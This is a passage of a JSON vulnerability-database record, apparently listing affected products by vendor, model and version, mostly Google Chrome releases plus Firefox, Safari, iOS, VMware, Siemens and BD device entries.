      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.742.19"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.371.0"
      },
      {
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "3.6.4"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "32.0.1700.56"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.48"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "32.0.1668.6"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.782.107"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.615.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.599.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.41"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1025.99"
      },
      {
        "model": "safari",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "3.52"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "30.0.1599.51"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.452.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "27.0.1453.102"
      },
      {
        "model": "enterprise mrg",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "2"
      },
      {
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "1.0.6"
      },
      {
        "model": "focal point linux",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bd",
        "version": "-0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.963.12"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "35.0.1916.92"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.6"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.24"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "32.0.1675.2"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "16.0.912.30"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.696.50"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "4.2.1"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "20.0.1132.8"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "2.0.172.28"
      },
      {
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "3.5.16"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "15.0.873.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "4.0.301.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "27.0.1453.116"
      },
      {
        "model": "vrealize automation",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "6.2.5"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.366.4"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.794.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "7.0.517.42"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.53"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "30.0.1599.40"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "20.0.1132.35"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.781.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "53.0.2785.143"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.375.60"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "37.0.2062.34"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1298.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "2.0.157.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "34.0.1847.134"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.835.18"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.7"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.742.72"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.835.34"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.554.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1084.45"
      },
      {
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "40.0.3"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "28.0.1500.71"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1084.13"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "28.0.1500.36"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.775.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "20.0.1132.7"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.742.59"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.631.0"
      },
      {
        "model": "communications lsms",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "13.2"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.125"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "27.0.1453.114"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.835.102"
      },
      {
        "model": "safari",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "4.30"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.54"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.477.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.941.0"
      },
      {
        "model": "pyxis cathrack",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bd",
        "version": "v80"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.335.3"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.375.65"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.696.35"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "7.0.516.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.430.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "32.0.1684.2"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.375.11"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "30.0.1599.37"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.457.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1289.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1084.48"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1008.0"
      },
      {
        "model": "safari",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "7.1.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.943.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "35.0.1916.6"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "28.0.1500.21"
      },
      {
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "3.6.3"
      },
      {
        "model": "safari",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "4"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.609.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.742.114"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364160"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "4.0.211.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1025.42"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.342.4"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "4.2.5"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.582.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "16.0.912.63"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.589.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.963.41"
      },
      {
        "model": "safari",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "6.2.2"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.43"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "31.0.1650.4"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "30.0.1599.90"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.575.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "32.0.1671.8"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "32.0.1663.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "22.0.1229.26"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.356.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "29.0.1547.33"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1280.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.782.84"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1312.21"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.57"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1084.30"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.122"
      },
      {
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "3.6.17"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.963.39"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "23.0.1271.37"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.375.95"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "4"
      },
      {
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "3.6.10"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.375.57"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "32.0.1700.74"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.726.0"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.73"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "33.0.1750.5"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "4.3"
      },
      {
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "27"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.375.84"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.667.3"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "20.0.1132.3"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1034.0"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.56"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.963.81"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "1.0.154.36"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "60.0.3112.80"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "15.0.874.22"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1025.112"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "3.0.195.32"
      },
      {
        "model": "rowa dose",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bd",
        "version": "0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.716.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.480.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.466.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "15.0.874.45"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.54"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.700.0"
      },
      {
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "1.0.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "7.0.517.28"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.154"
      },
      {
        "model": "xen",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "xen",
        "version": "0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "32.0.1684.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "30.0.1599.14"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.466.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "27.0.1453.5"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1312.48"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.742.82"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.696.21"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "32.0.1652.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "7.0.517.6"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.782.24"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "28.0.1500.68"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.627.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.466.4"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1312.28"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.19"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "37.0.2062.69"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.826.0"
      },
      {
        "model": "identity manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "2.7"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.43"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.597.47"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.581.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "20.0.1132.1"
      },
      {
        "model": "focal point solaris",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bd",
        "version": "-0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "7.0.544.0"
      },
      {
        "model": "safari",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "3.1.2"
      },
      {
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "43"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.648.130"
      },
      {
        "model": "fusion",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "8.5.5"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "4.1.249.1041"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "28.0.1500.42"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.336.0"
      },
      {
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "2.0.5"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.10"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "20.0.1132.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.742.11"
      },
      {
        "model": "simatic s7-1518-4 pn/dp odk",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "siemens",
        "version": "0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "52.0.2743.82"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "53.0.2785.113"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.835.124"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "20.0.1132.31"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1295.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.696.67"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.922.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1025.113"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.696.65"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "33.0.1750.42"
      },
      {
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "3.5.6"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.638.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1049.3"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "7.0.517.21"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.696.56"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "31.0.1650.10"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "7.0.517.12"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.782.219"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "41.0.2272.118"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "16.0.910.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "33.0.1750.149"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "32.0.1686.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.90"
      },
      {
        "model": "simatic ipc427d",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "siemens",
        "version": "0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.671.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "27.0.1453.69"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "23.0.1271.6"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.366.2"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "20.0.1132.16"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1084.46"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1055.1"
      },
      {
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "50.0.2"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.742.68"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "30.0.1599.84"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.342.3"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "33.0.1750.66"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.424.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "22.0.1229.37"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "1.0.154.39"
      },
      {
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "1.5.0.6"
      },
      {
        "model": "safari",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "7.1.2"
      },
      {
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "17.0.3"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "16.0.898.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.782.48"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.478.0"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "8.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.648.107"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.100"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.465.2"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "7.0.540.0"
      },
      {
        "model": "facspresto",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bd",
        "version": "0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "27.0.1453.57"
      },
      {
        "model": "vsphere integrated containers",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "1.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.597.46"
      },
      {
        "model": "safari",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "6.2.5"
      },
      {
        "model": "sql server for 32-bit systems service pack",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "20123"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1004.0"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.23"
      },
      {
        "model": "chrome",
        "scope": "eq",
